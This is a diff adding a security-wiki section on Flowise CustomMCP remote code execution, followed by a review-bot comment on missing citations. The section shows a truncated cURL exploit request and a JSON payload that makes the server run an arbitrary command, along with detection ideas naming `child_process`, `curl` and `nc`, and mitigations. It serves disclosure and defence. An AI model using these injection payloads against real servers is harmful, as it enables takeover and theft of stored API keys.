Flowise embeds MCP tooling inside its low-code LLM orchestrator, but its **CustomMCP** node trusts user-supplied JavaScript/command definitions that are later executed on the Flowise server. Two separate code paths trigger remote command execution:
165
+
166
+
-`mcpServerConfig` strings are parsed by `convertToValidJSONString()` using `Function('return ' + input)()` with no sandboxing, so any `process.mainModule.require('child_process')` payload executes immediately (CVE-2025-59528 / GHSA-3gcm-f6qx-ff7p). The vulnerable parser is reachable via the unauthenticated (in default installs) endpoint `/api/v1/node-load-method/customMCP`.
167
+
- Even when JSON is supplied instead of a string, Flowise simply forwards the attacker-controlled `command`/`args` into the helper that launches local MCP binaries. Without RBAC or default credentials, the server happily runs arbitrary binaries (CVE-2025-8943 / GHSA-2vv2-3x8x-4gv7).
168
+
169
+
Metasploit now ships two HTTP exploit modules (`multi/http/flowise_custommcp_rce` and `multi/http/flowise_js_rce`) that automate both paths, optionally authenticating with Flowise API credentials before staging payloads for LLM infrastructure takeover.
170
+
171
+
Typical exploitation is a single HTTP request. The JavaScript injection vector can be demonstrated with the same cURL payload Rapid7 weaponised:
172
+
173
+
```bash
174
+
curl -X POST http://flowise.local:3000/api/v1/node-load-method/customMCP \
Because the payload is executed inside Node.js, functions such as `process.env`, `require('fs')`, or `globalThis.fetch` are instantly available, so it is trivial to dump stored LLM API keys or pivot deeper into the internal network.
186
+
187
+
The command-template variant exercised by JFrog (CVE-2025-8943) does not even need to abuse JavaScript. Any unauthenticated user can force Flowise to spawn an OS command:
188
+
189
+
```json
190
+
{
191
+
"inputs": {
192
+
"mcpServerConfig": {
193
+
"command": "touch",
194
+
"args": ["/tmp/yofitofi"]
195
+
}
196
+
},
197
+
"loadMethod": "listActions"
198
+
}
199
+
```
200
+
201
+
#### Detection ideas
202
+
203
+
- Web server or Flowise logs containing requests to `/api/v1/node-load-method/customMCP` with unexpected `loadMethod` values, or payloads that reference `process.mainModule`, `child_process`, `fs`, etc.
204
+
- Process creation telemetry from the Flowise host for binaries launched under the Flowise service account (e.g., sudden `bash`, `powershell`, `curl`, `nc`, `python`).
205
+
- File integrity monitoring around `/tmp`, project directories, or `/home/flowise/.flowise` for artefacts created immediately after Flowise receives `customMCP` requests.
206
+
207
+
#### Mitigations
208
+
209
+
- Upgrade to **Flowise 3.0.6+** where `convertToValidJSONString` and the custom MCP loader were hardened; earlier versions (≤3.0.5) are trivially exploitable.
210
+
- Set `FLOWISE_USERNAME`/`FLOWISE_PASSWORD`, disable anonymous API access, and restrict `/api/v1/node-load-method/*` to trusted admin subnets via reverse proxies.
211
+
- Remove Custom MCP capability if not strictly required (`DISABLE_FLOWISE_CUSTOM_MCP=1`) or wrap it with an allow-list proxy so only vetted executables can be launched.
212
+
- Monitor and rotate any secrets stored inside Flowise (LLM provider API keys, database passwords) after an incident because the RCE primitives grant full filesystem and network access.
213
+
162
214
## References
163
215
-[CVE-2025-54136 – MCPoison Cursor IDE persistent RCE](https://research.checkpoint.com/2025/cursor-vulnerability-mcpoison/)
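Review bot: the References hunk only removes the MCPoison entry (CVE-2025-54136) and adds nothing for the Flowise material above, so CVE-2025-59528 / GHSA-3gcm-f6qx-ff7p and CVE-2025-8943 / GHSA-2vv2-3x8x-4gv7, plus the Rapid7 and JFrog write-ups the new text leans on, end up uncited; add those advisory and write-up links to References, and keep the MCPoison line if any other section of the page still refers to it. Two smaller points in the same hunk: the mitigation bullet that names `DISABLE_FLOWISE_CUSTOM_MCP=1` should cite where Flowise documents that variable, since the rest of the hunk names only `FLOWISE_USERNAME`/`FLOWISE_PASSWORD`; and "Without RBAC or default credentials, the server happily runs arbitrary binaries" reads as if default credentials were a safeguard, so reword to "without RBAC, or with default or no credentials".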